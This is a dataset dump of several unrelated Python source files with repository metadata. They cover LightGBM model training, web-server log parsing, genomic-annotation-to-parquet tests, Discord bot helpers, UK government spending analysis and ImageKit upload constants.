375570af4f92c8f4e216e1ebc0166477badfeb09 | 1,213 | py | Python | chapter11/step02/train_model.py | UserAdminD3us/Microsoft-Certified-Azure-Data-Scientist-Associate-Certification-Guide | 62873b5a99120d240a8df8c0b7f81e6c95d5be02 | [
"MIT"
] | null | null | null | chapter11/step02/train_model.py | UserAdminD3us/Microsoft-Certified-Azure-Data-Scientist-Associate-Certification-Guide | 62873b5a99120d240a8df8c0b7f81e6c95d5be02 | [
"MIT"
] | null | null | null | chapter11/step02/train_model.py | UserAdminD3us/Microsoft-Certified-Azure-Data-Scientist-Associate-Certification-Guide | 62873b5a99120d240a8df8c0b7f81e6c95d5be02 | [
"MIT"
] | null | null | null | import argparse
import os
import lightgbm as lgb
import joblib
parser = argparse.ArgumentParser()
parser.add_argument(
"--learning-rate",
type=float,
dest="learning_rate",
help="Learning date for LightGBM",
default=0.01,
)
parser.add_argument(
"--input-path",
type=str,
dest="input_path",
help="Directory containing the datasets",
default="../data",
)
parser.add_argument(
"--output-path",
type=str,
dest="output_path",
help="directory to store model",
default="./model",
)
args = parser.parse_args()
print(f"Loading data from {args.input_path}")
train_data = lgb.Dataset(os.path.join(args.input_path, "train_dataset.bin"))
validation_data = lgb.Dataset(os.path.join(args.input_path, "validation_dataset.bin"))
param = {
"task": "train",
"objective": "binary",
"metric": "auc",
"num_leaves": 5,
"learning_rate": args.learning_rate,
}
model = lgb.train(
param,
train_set=train_data,
valid_sets=validation_data,
early_stopping_rounds=5,
)
output_path = args.output_path
if not os.path.exists(output_path):
os.makedirs(output_path)
joblib.dump(value=model, filename=os.path.join(output_path, "model.joblib"))
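# Example invocation (a sketch; the paths are placeholders for your own data):
#   python train_model.py --learning-rate 0.05 \
#       --input-path ../data --output-path ./model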
| 22.054545 | 86 | 0.690025 | 162 | 1,213 | 4.993827 | 0.41358 | 0.086527 | 0.063041 | 0.037083 | 0.091471 | 0.091471 | 0.091471 | 0.091471 | 0.091471 | 0 | 0 | 0.004921 | 0.162407 | 1,213 | 54 | 87 | 22.462963 | 0.791339 | 0 | 0 | 0.106383 | 0 | 0 | 0.258038 | 0.018137 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.085106 | 0 | 0.085106 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37567441cec8df2625f386786c43826f9d7358ea | 6,446 | py | Python | log_parser/__init__.py | kozlovzxc/python-log-parser | a7b5c2b489e7cece437dfc36746ff58399646fd0 | [
"MIT"
] | null | null | null | log_parser/__init__.py | kozlovzxc/python-log-parser | a7b5c2b489e7cece437dfc36746ff58399646fd0 | [
"MIT"
] | null | null | null | log_parser/__init__.py | kozlovzxc/python-log-parser | a7b5c2b489e7cece437dfc36746ff58399646fd0 | [
"MIT"
] | null | null | null | from pyparsing import *
from string import printable, uppercase
from dateutil import parser as dateutil_parser
import yaml
class LogParser(object):
ACCESS_LOG_VARS = {
'request.first_line' : Word(uppercase)('request.method')+\
Literal(" ")+\
SkipTo(" ")('request.uri')+\
Literal(" ")+\
Combine("HTTP/"+\
Word(nums+'.', exact=3))('request.protocol'),
#'request.time' : Word(alphanums+' /:+-').setParseAction(lambda s,l,t : dateutil_parser.parse(t[0].replace(':', ' ', 1)) )
}
def translate_nginx_varname(self, chunk):
name = chunk['var_name']
if name in self.NGINX_TO_INTERNAL:
return self.NGINX_TO_INTERNAL[name]
elif name.startswith('http_'):
return 'request.headers.'+name[5:].replace('_', '-')
elif name.startswith('sent_http_'):
return 'response.headers.'+name[10:].replace('_', '-')
elif name.startswith('request_'):
# body, body_file, id, completion, length, method, uri
return 'request.'+name[8:]
elif name.startswith('cookie_'):
return 'request.headers.cookies.'+name[7:].replace('_', '-')
elif name.startswith('arg_'):
return 'request.args.'+name[4:]
elif name.startswith('tcpinfo_'):
# rtt, rttvar, snd_cwnd, rcv_space
return 'tcpinfo.'+name[8:]
else:
return name
def translate_apache_varname(self, chunk):
name = chunk['var_name']
if 'option' in chunk:
option = chunk['option']
if name == 'a':
if option == 'c':
return 'request.proxy.src_ip'
else:
raise KeyError('Unknown Key: {0}'.format(option))
elif name =='p':
if option == 'canonical':
return '' #???
elif option == 'local':
return 'request.dst_port'
elif option == 'remote':
return 'request.src_port'
elif name == 'C':
return 'request.headers.cookies.'+option.lower()
elif name == 'e':
return 'server.enviroment.'+option.lower()
elif name == 'i':
return 'request.headers.'+option.lower()
elif name == 'o':
return 'response.headers.'+option.lower()
elif name == 'P':
return 'server.worker.'+option.lower()
elif name == 't':
return 'request.{0}_time'.format(option.lower())
elif name == 'T':
return 'request.{0}_time_consume'.format(option.lower())
else:
return name
else:
return self.APACHE_TO_INTERNAL[name]
def __init__(self, log_format, log_type='nginx'):
        with open('log_parser/nginx_translation.yml', 'r') as nginx_translation:
            self.NGINX_TO_INTERNAL = yaml.safe_load(nginx_translation)
        with open('log_parser/apache_translation.yml', 'r') as apache_translation:
            self.APACHE_TO_INTERNAL = yaml.safe_load(apache_translation)
self.default_white_chars = ParserElement.DEFAULT_WHITE_CHARS
ParserElement.setDefaultWhitespaceChars('')
settings = {
'nginx':{
'variable': Group(Suppress('$')+ Word(alphanums+'_')('var_name')),
'literal': Word(printable, excludeChars='$'),
'translation': self.translate_nginx_varname,
},
'apache':{
'variable': Group(Suppress(\
'%'+\
Optional(\
Literal('!')\
)+\
Optional(\
Word(nums)+\
ZeroOrMore(\
','+\
Word(nums)\
)\
)+\
Optional(\
Word('<>', exact=1)\
)\
)+\
Optional(Suppress('{')+\
Word(alphas+'-')('option')+\
Suppress('}')\
)+\
Word(alphas, min=1, max=2)('var_name')),
'literal': Word(printable, excludeChars='%'),
'translation': self.translate_apache_varname,
},
'default':{
'variable': Group('${'+ Word(alphanums+'_')('var_name')+'}'),
'literal': Word(printable, excludeChars='${}'),
'translation': lambda token: token[2:-1]
},
}
        log_type_settings = settings.get(log_type, settings['default'])
variable = log_type_settings['variable']
literal = log_type_settings['literal']
translation = log_type_settings['translation']
log_format_parser = ZeroOrMore(variable|literal)
log_format_tokens = log_format_parser.parseString(log_format)
self.parser = Empty()
for i in xrange(0, len(log_format_tokens)):
chunk = log_format_tokens[i]
if isinstance(chunk, str):
append = Literal(chunk)
else:
var_name = translation(chunk)
if var_name in self.ACCESS_LOG_VARS:
append = self.ACCESS_LOG_VARS[var_name]
else:
if i + 1 < len(log_format_tokens):
append = SkipTo(log_format_tokens[i+1])
else:
append = SkipTo(LineEnd())
append = append.setResultsName(var_name)
self.parser += append
ParserElement.setDefaultWhitespaceChars(self.default_white_chars)
def _make_dict(self, parsed):
return {key:(''.join(val._asStringList()) if isinstance(val, ParseResults) else val) for key,val in parsed.items()}
def parse(self, record):
return self._make_dict(self.parser.parseString(record))
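    # Example usage (a sketch; assumes the yaml translation tables exist on disk):
    #   parser = LogParser('$remote_addr [$time_local] "$request"', log_type='nginx')
    #   record = parser.parse('127.0.0.1 [10/Oct/2000:13:55:36 -0700] "GET / HTTP/1.0"')
    #   # `record` maps the translated field names to the parsed string values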
| 42.973333 | 134 | 0.477195 | 564 | 6,446 | 5.265957 | 0.271277 | 0.03771 | 0.036364 | 0.038384 | 0.134007 | 0.116498 | 0.116498 | 0.116498 | 0.093603 | 0 | 0 | 0.005415 | 0.398387 | 6,446 | 149 | 135 | 43.261745 | 0.760444 | 0.032578 | 0 | 0.161765 | 0 | 0 | 0.113465 | 0.021987 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036765 | false | 0 | 0.029412 | 0.014706 | 0.25 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37578518bee7829df262610a24f622d6d408232d | 12,196 | py | Python | python/biograph/vdb/parquet_test.py | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 16 | 2021-07-14T23:32:31.000Z | 2022-03-24T16:25:15.000Z | python/biograph/vdb/parquet_test.py | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-20T20:39:47.000Z | 2021-09-16T20:57:59.000Z | python/biograph/vdb/parquet_test.py | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-15T19:38:35.000Z | 2022-01-31T19:24:56.000Z | # pylint: disable=missing-docstring
import unittest
import gzip
import tempfile
from biograph.vdb import vcf_to_parquet, anno_to_parquet
import biograph.vdb.parquet
import pyarrow as pa
import pandas as pd
class ParquetTestCases(unittest.TestCase):
def setUp(self):
# Make sure we test having multiple input chunks
biograph.vdb.parquet.ConverterBase.CHUNK_ROWS = 50
self.maxDiff = None
self.span_bases = 59
def get_parquet_rows(self, pq_path):
"Returns all records from the given parquet file as a list of dict objects"
f = pa.parquet.ParquetDataset(pq_path)
# Order within individual .parquet files is sorted by pos, but order is not
# guaranteed for a whole partitioned dataset, so sort here.
df = f.read().to_pandas().sort_values(["chrom", "pos"])
# Convert NAN to Python's 'None':
df = df.where(pd.notnull(df), None)
records = df.to_dict(orient='records')
        # Check that each row's 'spans' value is correct, then remove it.
for row in records:
self.assertLessEqual(row['pos'], row['varend'])
expected_spans = []
span = row['pos'] // self.span_bases
while span <= row['varend'] // self.span_bases:
expected_spans.append(span)
span += 1
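            # Worked example: with span_bases = 59, a record at pos 10402 with
            # varend 10440 has 10402 // 59 == 10440 // 59 == 176, so the
            # expected span list is simply [176].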
self.assertListEqual(expected_spans, list(row['spans']), msg=repr(row))
del row['spans']
return records
# @unittest.skip(True)
def test_vcf(self):
with tempfile.TemporaryDirectory() as td:
out_fn = td
with gzip.open("golden/ftest/vdb/vdb002.vcf.gz", "rb") as fh:
header_lines = vcf_to_parquet("grch37", fh, out_fn, span_bases=self.span_bases)
self.assertEqual(len(header_lines), 140)
self.assertEqual(header_lines[0], '##fileformat=VCFv4.1')
actual = self.get_parquet_rows(out_fn)
self.assertEqual(len(actual), 2500)
first_row = actual[0]
self.assertDictEqual(first_row, {
'alt': 'A',
'chrom': '1',
'filt': 'lowq',
'info': [('NS', '1'), ('POP', ''), ('SVLEN', '-37'), ('SVTYPE', 'DEL')],
'pos': 10402,
'qual': 11.0,
'ref': 'ACCCTAACCCTAACCCTAACCCTAACCCTAACCCTAAC',
'reflen': 38,
'sample': [('GT', '0/1'),
('AC', '6,8'),
('AD', '7,1'),
('DC', '6,8'),
('DCC', '1,0'),
('DDC', '5,8'),
('DMO', '133,143'),
('DP', '8'),
('DS', '45,18'),
('DXO', '148,148'),
('EC', '6,8'),
('GQ', '1'),
('LAALTGC', '0.68'),
('LAALTSEQLEN', '125'),
('LALANCH', '0'),
('LARANCH', '0'),
('LAREFGC', '0.641975'),
('LAREFSPAN', '162'),
('LASCORE', '0'),
('MC', '6,8'),
('MO', '133,143'),
('MP', '0,0'),
('NR', '8,8'),
('NUMASM', '1'),
('OV', '0'),
('PAD', '0,0'),
('PDP', '0'),
('PG', '0|1'),
('PI', '7854514'),
('PL', '1,3,16'),
('RC', '0'),
('UC', '2,8'),
('UCC', '0,0'),
('UDC', '2,8'),
('UMO', '146,143'),
('US', '10,18'),
('UXO', '146,148'),
('XC', '6,8'),
('XO', '148,148')],
'varend': 10440,
'varid': None
})
# @unittest.skip(True)
def test_vcf_verbose_threads(self):
with tempfile.TemporaryDirectory() as td:
out_fn = td
with gzip.open("golden/ftest/vdb/vdb002.vcf.gz", "rb") as fh:
header_lines = vcf_to_parquet("grch37", fh, out_fn, nthreads=10, span_bases=self.span_bases, verbose=True)
self.assertEqual(len(header_lines), 140)
self.assertEqual(header_lines[0], '##fileformat=VCFv4.1')
actual = self.get_parquet_rows(out_fn)
self.assertEqual(len(actual), 2500)
first_row = actual[0]
self.assertDictEqual(first_row, {
'alt': 'A',
'chrom': '1',
'filt': 'lowq',
'info': [('NS', '1'), ('POP', ''), ('SVLEN', '-37'), ('SVTYPE', 'DEL')],
'pos': 10402,
'qual': 11.0,
'ref': 'ACCCTAACCCTAACCCTAACCCTAACCCTAACCCTAAC',
'reflen': 38,
'sample': [('GT', '0/1'),
('AC', '6,8'),
('AD', '7,1'),
('DC', '6,8'),
('DCC', '1,0'),
('DDC', '5,8'),
('DMO', '133,143'),
('DP', '8'),
('DS', '45,18'),
('DXO', '148,148'),
('EC', '6,8'),
('GQ', '1'),
('LAALTGC', '0.68'),
('LAALTSEQLEN', '125'),
('LALANCH', '0'),
('LARANCH', '0'),
('LAREFGC', '0.641975'),
('LAREFSPAN', '162'),
('LASCORE', '0'),
('MC', '6,8'),
('MO', '133,143'),
('MP', '0,0'),
('NR', '8,8'),
('NUMASM', '1'),
('OV', '0'),
('PAD', '0,0'),
('PDP', '0'),
('PG', '0|1'),
('PI', '7854514'),
('PL', '1,3,16'),
('RC', '0'),
('UC', '2,8'),
('UCC', '0,0'),
('UDC', '2,8'),
('UMO', '146,143'),
('US', '10,18'),
('UXO', '146,148'),
('XC', '6,8'),
('XO', '148,148')],
'varend': 10440,
'varid': None
})
# @unittest.skip(True)
def parse_anno(self, fmt, build, filename):
with tempfile.TemporaryDirectory() as td:
out_fn = td
with open(filename, "rb") as fh:
header_lines = anno_to_parquet(fmt, build, fh, out_fn, span_bases=self.span_bases)
records = self.get_parquet_rows(out_fn)
return header_lines, records
# @unittest.skip(True)
def test_vcf_anno(self):
header_lines, actual = self.parse_anno("vcf", "grch37", "golden/ftest/vdb/dbsnp-sample.vcf")
self.assertEqual(len(header_lines), 85)
self.assertEqual(header_lines[0], '##fileformat=VCFv4.0')
self.assertEqual(len(actual), 4162)
first_row = actual[0]
self.assertDictEqual(first_row,
{'reflen': 1, 'chrom': 'X', 'pos': 60001, 'varend': 60002,
'varid': 'rs1226858834', 'ref': 'T', 'alt': 'A', 'qual': None,
'filt': None,
'info': [('RS', '1226858834'), ('RSPOS', '60002'), ('dbSNPBuildID', '151'), ('SSR', '0'), ('SAO', '0'), ('VP', '0x050000000005000002000100'), ('WGT', '1'), ('VC', 'SNV'), ('ASP', ''), ('TOPMED', '0.99631275484199796,0.00368724515800203')],
'source': None, 'feature': None, 'score': None,
'frame': None, 'strand': None, 'attributes': None})
# @unittest.skip(True)
def test_gtf_anno(self): # GTF, also known as GFFv2
header_lines, actual = self.parse_anno("gtf", "grch37", "golden/ftest/vdb/gtf-37-sample.gtf")
self.assertEqual(len(header_lines), 5)
self.assertEqual(header_lines[0], '#!genome-build GRCh37.p13')
self.assertEqual(len(actual), 7)
first_gene_row = [row for row in actual if row['feature'] == 'gene'][0]
self.assertDictEqual(first_gene_row,
{'reflen': 2543, 'chrom': '1', 'pos': 11868, 'varend': 14411,
'varid': 'DDX11L1', 'ref': None, 'alt': None, 'qual': None,
'filt': None, 'info': None, 'source': 'pseudogene',
'feature': 'gene', 'score': None, 'frame': None, 'strand': '+',
'attributes': [('gene_id', 'ENSG00000223972'),
('gene_name', 'DDX11L1'),
('gene_source', 'ensembl_havana'),
('gene_biotype', 'pseudogene')]})
# @unittest.skip(True)
def test_gff_anno(self): # GFFv3
header_lines, actual = self.parse_anno("gff", "grch38", "golden/ftest/vdb/gff-38-sample.gff3")
self.assertEqual(len(header_lines), 200)
self.assertEqual(header_lines[0], '##gff-version 3')
self.assertEqual(len(actual), 64)
third_row = actual[2]
# Floats are only almost equal.
self.assertAlmostEqual(third_row['score'], 0.9990000128746033)
del third_row['score']
self.assertDictEqual(third_row, {
'alt': None,
'attributes': [('logic_name', 'eponine')],
'chrom': '1',
'feature': 'biological_region',
'filt': None,
'frame': None,
'info': None,
'pos': 10649,
'qual': None,
'ref': None,
'reflen': 7,
'source': '.',
'strand': '+',
'varend': 10656,
'varid': 'eponine'
})
other_rows = [a for a in actual if a['varid'] == 'DDX11L1']
self.assertEqual(len(other_rows), 1)
self.assertDictEqual(other_rows[0],
{
'alt': None,
'attributes': [('ID', 'gene:ENSG00000223972'),
('Name', 'DDX11L1'),
('biotype', 'transcribed_unprocessed_pseudogene'),
('description',
'DEAD/H-box helicase 11 like 1 (pseudogene) [Source:HGNC Symbol;Acc:HGNC:37102]'),
('gene_id', 'ENSG00000223972'),
('logic_name', 'havana_homo_sapiens'),
('version', '5')],
'chrom': '1',
'feature': 'pseudogene',
'filt': None,
'frame': None,
'info': None,
'pos': 11868,
'qual': None,
'ref': None,
'reflen': 2540,
'score': None,
'source': 'havana',
'strand': '+',
'varend': 14408,
'varid': 'DDX11L1'
})
if __name__ == '__main__':
unittest.main(verbosity=2)
| 45.00369 | 269 | 0.38816 | 1,066 | 12,196 | 4.333959 | 0.287993 | 0.040476 | 0.042857 | 0.024675 | 0.470563 | 0.398485 | 0.366667 | 0.331169 | 0.311039 | 0.301299 | 0 | 0.084639 | 0.455559 | 12,196 | 270 | 270 | 45.17037 | 0.611145 | 0.044605 | 0 | 0.583333 | 0 | 0.004167 | 0.180087 | 0.030655 | 0 | 0 | 0.00222 | 0 | 0.104167 | 1 | 0.033333 | false | 0 | 0.029167 | 0 | 0.075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375827b6a9a91f6310a50237f1737c67e7e7e925 | 2,430 | py | Python | bot/libraries/helper.py | Feyko/FICSIT-Fred | 94f049214d82d61862fe03405a2fd60a51e48177 | [
"MIT"
] | 5 | 2020-05-24T21:29:34.000Z | 2022-02-04T03:09:18.000Z | bot/libraries/helper.py | Feyko/FICSIT-Fred | 94f049214d82d61862fe03405a2fd60a51e48177 | [
"MIT"
] | 33 | 2021-08-02T16:41:48.000Z | 2022-03-31T21:22:10.000Z | bot/libraries/helper.py | Feyko/FICSIT-Fred | 94f049214d82d61862fe03405a2fd60a51e48177 | [
"MIT"
] | 3 | 2021-03-03T18:48:27.000Z | 2021-07-28T12:23:27.000Z | import re
import asyncio
from html.parser import HTMLParser
import aiohttp
from discord.ext import commands
import config
def is_bot_author(user_id: int):
    return user_id == 227473074616795137
async def t3_only(ctx):
return is_bot_author(ctx.author.id) or permission_check(ctx, 4)
async def mod_only(ctx):
return is_bot_author(ctx.author.id) or permission_check(ctx, 6)
def permission_check(ctx, level: int):
perms = config.PermissionRoles.fetch_by_lvl(level)
main_guild = ctx.bot.get_guild(config.Misc.fetch("main_guild_id"))
if (main_guild_member := main_guild.get_member(ctx.author.id)) is None:
return False
    has_roles = [role.id for role in main_guild_member.roles]
for role in perms:
if role.perm_lvl >= level:
if role.role_id in has_roles:
return True
else:
break
return False
class aTagParser(HTMLParser):
link = ''
view_text = ''
def clear_output(self):
self.link = ''
self.view_text = ''
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attr in attrs:
if attr[0] == 'href':
self.link = f'({attr[1]})'
def handle_endtag(self, tag):
pass
def handle_data(self, data):
self.view_text = f'[{data}]'
def formatDesc(desc):
revisions = {
"<b>": "**",
"</b>": "**",
"<u>": "__",
"</u>": "__",
"<br>": "",
}
for old, new in revisions.items():
desc = desc.replace(old, new)
items = []
embeds = dict()
items.extend([i.groups() for i in re.finditer('(<a.+>.+</a>)', desc)]) # Finds all unhandled links
for i in items:
i = i[0] # regex returns a one-element tuple :/
parser = aTagParser()
parser.feed(i)
embeds.update({i: parser.view_text + parser.link})
for old, new in embeds.items():
desc = desc.replace(old, new)
desc = re.sub('#+ ', "", desc)
return desc
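# Worked example of formatDesc (deterministic given the rules above):
#   formatDesc('<b>Hi</b> <a href="https://example.com">link</a>')
#   returns '**Hi** [link](https://example.com)'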
async def repository_query(query: str, bot):
bot.logger.info(f"SMR query of length {len(query)} requested")
async with await bot.web_session.post("https://api.ficsit.app/v2/query", json={"query": query}) as response:
bot.logger.info(f"SMR query returned with response {response.status}")
value = await response.json()
bot.logger.info("SMR response decoded")
return value
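# Example query (hypothetical field names; the real SMR GraphQL schema may differ):
#   mods = await repository_query('{ getMods { mods { name } } }', bot)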
| 26.413043 | 112 | 0.597531 | 328 | 2,430 | 4.301829 | 0.393293 | 0.031892 | 0.023388 | 0.021262 | 0.145996 | 0.145996 | 0.077959 | 0.077959 | 0.077959 | 0.077959 | 0 | 0.014013 | 0.265844 | 2,430 | 91 | 113 | 26.703297 | 0.776906 | 0.025514 | 0 | 0.057971 | 0 | 0 | 0.095983 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101449 | false | 0.014493 | 0.086957 | 0.014493 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37589b5d5e93593f28c9b4b9003c4e6bfe3a425e | 8,419 | py | Python | src/build_df_to_plot.py | crahal/centgovspend | 82ae1f63ec735da59cbe75dd47eda51d202d7555 | [
"MIT"
] | 4 | 2018-06-23T09:08:29.000Z | 2021-11-11T18:27:50.000Z | src/build_df_to_plot.py | crahal/centgovspend | 82ae1f63ec735da59cbe75dd47eda51d202d7555 | [
"MIT"
] | null | null | null | src/build_df_to_plot.py | crahal/centgovspend | 82ae1f63ec735da59cbe75dd47eda51d202d7555 | [
"MIT"
] | null | null | null | import glob
import ntpath
import pandas as pd
def build_timely_df(payments):
    ''' build the longitudinal dataset for figure 2b '''
    timely_df = pd.DataFrame(columns=['Number of Payments',
                                      'Value of Payments'])
    quarters = {'Q1': (0, 3), 'Q2': (3, 6), 'Q3': (6, 9), 'Q4': (9, 12)}
    for year in list(range(2009, 2018)):
        for quarter, (start, end) in quarters.items():
            in_quarter = payments[(start < payments['date'].dt.month) &
                                  (payments['date'].dt.month <= end) &
                                  (payments['date'].dt.year == year)]
            timely_df.at[str(year) + quarter,
                         'Number of Payments'] = len(in_quarter)/1000
            timely_df.at[str(year) + quarter,
                         'Value of Payments'] = in_quarter['amount'].sum()/1000000000
    timely_resetindex = timely_df.reset_index()
    return timely_resetindex, timely_df
def build_pesa_df(pesa_path, merged_path):
''' build a df comparing centgovspend to pesa '''
pesa_table = pd.read_csv(pesa_path, index_col='Department')
list_of_files = []
    for file_ in glob.glob(merged_path):
        dept = ntpath.basename(file_)[:-4]
        if dept in pesa_table.index:
            df = pd.read_csv(file_, index_col=None, low_memory=False,
                             header=0, encoding='latin-1',
                             dtype={'transactionnumber': str,
                                    'amount': float,
                                    'supplier': str,
                                    'date': str,
                                    'expensearea': str,
                                    'expensetype': str,
                                    'file': str})
            df['dept'] = dept
            cols_to_consider = ['amount', 'date', 'dept', 'expensearea',
                                'expensetype', 'transactionnumber', 'supplier']
            grouped = df.groupby(cols_to_consider)
            index = [gp_keys[0] for gp_keys in grouped.groups.values()]
            df_clean = df.reindex(index)
            pesa_table.at[dept, 'Raw_total_value'] = df_clean.amount.sum()
            pesa_table.at[dept, 'Raw_total_number'] = len(df_clean.amount)
            df_clean['date_dt'] = pd.to_datetime(df_clean['date'],
                                                 errors='coerce')
            df_temp = df_clean[(df_clean['date_dt'] > '2016-04-01') &
                               (df_clean['date_dt'] < '2017-03-31')]
            pesa_table.at[dept, 'Raw_20162017_value'] = df_temp['amount'].sum()
            pesa_table.at[dept, 'Raw_20162017_number'] = len(df_temp)
            pesa_table.at[dept,
                          'Raw_20162017_filecount'] = len(df_temp['file'].
                                                          unique())
            df_temp = df_clean[(df_clean['date_dt'] > '2017-04-01') &
                               (df_clean['date_dt'] < '2018-03-31')]
            pesa_table.at[dept, 'Raw_20172018_value'] = df_temp['amount'].sum()
            pesa_table.at[dept, 'Raw_20172018_number'] = len(df_temp)
            pesa_table.at[dept,
                          'Raw_20172018_filecount'] = len(df_temp['file'].
                                                          unique())
            tempdf = pd.merge(pd.DataFrame(df.groupby(['file']).size()).
                              rename({0: 'full_count'}, axis=1),
                              pd.DataFrame(df_clean[df_clean['date_dt'].
                                           isnull()].
                                           groupby(['file']).size()).
                              rename({0: 'nulldate_count'}, axis=1),
                              how='left', left_index=True, right_index=True)
            tempdf['dept'] = dept
            list_of_files.append(tempdf)
list_of_files = pd.concat(list_of_files, sort=False)
pesa_table['Raw_20162017_value'] = pesa_table['Raw_20162017_value']/1000000
pesa_table['Raw_20172018_value'] = pesa_table['Raw_20172018_value']/1000000
pesa_table = pesa_table.rename({'hmtreas': 'HMT',
'dfinttrade': 'DIT',
'foroff': 'FO',
'defra': 'DEFRA',
'dcultmedsport': 'DCMS',
'cabinetoffice': 'CO',
'dfintdev': 'DID',
'mojust': 'MOJ',
'homeoffice': 'HO',
'dbusenind': 'BEIS',
'dftransport': 'DT',
'mhclg': 'MHCLG',
'modef': 'MoD',
'hmrc': 'HMRC',
'dfeducation': 'DfE',
'dohealth': 'DoH',
'dworkpen': 'DWP'},
axis=0)
pesa_table['20172018Budget'] = pesa_table['20172018Budget']/1000
pesa_table['Raw_20172018_value'] = pesa_table['Raw_20172018_value']/1000
pesa_table['Ratio_20172018'] = pd.to_numeric(pesa_table['Raw_20172018_value']/pesa_table['20172018Budget'])
return pesa_table, list_of_files
def trillions(x, pos):
return '£%1.1ftrn' % (x)
def billions(x, pos):
return '£%1.0fbn' % (x)
def thousands(x, pos):
return '%1.0fk' % (x)
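# These three functions are matplotlib tick formatters; a minimal usage sketch:
#   from matplotlib.ticker import FuncFormatter
#   ax.yaxis.set_major_formatter(FuncFormatter(billions))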
def clean_occupations(x):
x = x.replace('.', '')
x = x.replace(',', '')
return x.title()
def clean_officer_names(x):
    parts = x.split(' ')
    if len(parts) >= 2:
        return parts[1]
def clean_countries(x):
    x = x.lower()
    for nation in ['england', 'scotland', 'wales', 'northern ireland',
                   'britain']:
        x = x.replace(nation, 'united kingdom')
    x = x.replace('.', '').replace(',', '')
    if x[0:2] == 'gb':
        x = 'united kingdom'
    return x.title()
def clean_nationalities(x):
    x = x.lower()
    for nationality in ['english', 'scottish', 'welsh', 'northern irish',
                        'united kingdom']:
        x = x.replace(nationality, 'british')
    x = x.replace('.', '').replace(',', '')
    if x[0:2] == 'uk':
        x = 'british'
    return x.title()
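# Worked examples (deterministic given the replacement rules above):
#   clean_countries('Scotland')   -> 'United Kingdom'
#   clean_nationalities('Welsh')  -> 'British'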
| 47.835227 | 112 | 0.473215 | 868 | 8,419 | 4.420507 | 0.228111 | 0.043784 | 0.080271 | 0.069325 | 0.545478 | 0.434715 | 0.365911 | 0.35705 | 0.338546 | 0.314829 | 0 | 0.058424 | 0.369759 | 8,419 | 175 | 113 | 48.108571 | 0.664342 | 0.010334 | 0 | 0.251613 | 0 | 0 | 0.168734 | 0.005403 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058065 | false | 0.006452 | 0.019355 | 0.019355 | 0.135484 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375baab0f35211b2da08b1e7f0a7cfd2b213edad | 361 | py | Python | imagekitio/constants/files.py | samims/imagekit-python | 4bc8041e22c6333710645ddc95446c9c348eea5b | [
"MIT"
] | 1 | 2020-01-20T16:56:32.000Z | 2020-01-20T16:56:32.000Z | imagekitio/constants/files.py | samims/imagekit-python | 4bc8041e22c6333710645ddc95446c9c348eea5b | [
"MIT"
] | null | null | null | imagekitio/constants/files.py | samims/imagekit-python | 4bc8041e22c6333710645ddc95446c9c348eea5b | [
"MIT"
] | null | null | null | VALID_FILE_OPTIONS = [
"path",
"fileType",
"tags",
"includeFolder",
"name",
"limit",
"skip",
]
VALID_FILE_DETAIL_OPTIONS = ["fileID"]
VALID_UPLOAD_OPTIONS = [
"file",
"file_name",
"use_unique_file_name",
"tags",
"folder",
"is_private_file",
"custom_coordinates",
"response_fields",
"metadata"
]
| 15.041667 | 38 | 0.581717 | 35 | 361 | 5.571429 | 0.657143 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.257618 | 361 | 23 | 39 | 15.695652 | 0.727612 | 0 | 0 | 0.095238 | 0 | 0 | 0.407202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375c80d3b986b5561b93d213ff84e9281e6dd2b6 | 9,972 | py | Python | src/getContents.py | ajayz09/amazon-textract | bea3028596d6b60482017e12b80cbb0d2b91d3a5 | [
"Apache-2.0"
] | 1 | 2021-01-03T01:23:52.000Z | 2021-01-03T01:23:52.000Z | src/getContents.py | ajayz09/amazon-textract | bea3028596d6b60482017e12b80cbb0d2b91d3a5 | [
